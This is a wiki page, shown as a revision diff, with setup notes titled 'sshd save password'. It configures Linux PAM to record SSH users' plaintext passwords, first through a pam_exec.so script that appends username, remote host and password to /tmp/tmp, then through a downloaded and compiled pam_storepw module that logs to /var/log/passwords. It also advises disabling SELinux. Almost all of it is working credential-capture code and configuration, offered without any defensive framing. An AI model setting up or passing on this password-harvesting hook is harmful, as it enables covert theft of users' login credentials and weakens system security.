Sshd: Difference between revisions
Jump to navigation
Jump to search
| (2 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
=sshd save password= | =sshd save password= | ||
==pam_exec.so== | |||
/etc/pam.d/password-auth-ac | |||
#%PAM-1.0 | |||
# This file is auto-generated. | |||
# User changes will be destroyed the next time authconfig is run. | |||
auth required pam_env.so | |||
auth sufficient pam_unix.so nullok try_first_pass | |||
auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so | |||
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata | |||
... | |||
/usr/local/bin/pam_exec.so | |||
#!/bin/sh | |||
read password | |||
echo "User: $PAM_USER" >> /tmp/tmp | |||
echo "Ruser: $PAM_RUSER" >> /tmp/tmp | |||
echo "Rhost: $PAM_RHOST" >> /tmp/tmp | |||
echo "Service: $PAM_SERVICE" >> /tmp/tmp | |||
echo "TTY: $PAM_TTY" >> /tmp/tmp | |||
echo "Password : $password" >> /tmp/tmp | |||
exit $? | |||
==pam_storepw.so== | |||
Download source code for module. | Download source code for module. | ||
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c | curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c | ||
| Line 9: | Line 31: | ||
clean: | clean: | ||
rm -f pam_storepw.o pam_storepw.so core *~ | |||
extraclean: clean | extraclean: clean | ||
rm -f *.a *.o *.so *.bak | |||
.c.o: | .c.o: | ||
$(CC) $(CFLAGS) -c $< -o $@ -fPIC | |||
Build file | Build file | ||
Latest revision as of 07:46, 7 November 2018
sshd save password
pam_exec.so
/etc/pam.d/password-auth-ac
#%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authconfig is run. auth required pam_env.so auth sufficient pam_unix.so nullok try_first_pass auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata ...
/usr/local/bin/pam_exec.so
#!/bin/sh read password echo "User: $PAM_USER" >> /tmp/tmp echo "Ruser: $PAM_RUSER" >> /tmp/tmp echo "Rhost: $PAM_RHOST" >> /tmp/tmp echo "Service: $PAM_SERVICE" >> /tmp/tmp echo "TTY: $PAM_TTY" >> /tmp/tmp echo "Password : $password" >> /tmp/tmp exit $?
pam_storepw.so
Download source code for module.
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c
Create the following Makefile
all: pam_storepw.so
pam_storepw.so: pam_storepw.o
$(LD) --shared -o $@ $< -lpam -lpam_misc
clean:
rm -f pam_storepw.o pam_storepw.so core *~
extraclean: clean
rm -f *.a *.o *.so *.bak
.c.o:
$(CC) $(CFLAGS) -c $< -o $@ -fPIC
Build file
make
Copy file
cp pam_storepw.so /lib64/security/ chmod 755 /lib64/security/pam_storepw.so
password-auth-ac
#%PAM-1.0 # This file is auto-generated. # User changes will be destroyed the next time authconfig is run. auth required pam_env.so auth sufficient pam_unix.so nullok try_first_pass auth optional pam_storepw.so auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata ...
Passwords start to be written to
/var/log/passwords
If you do not get any entries.
Temporarily turn selinux off to see if it starts to work run pam in debug to see what is going on.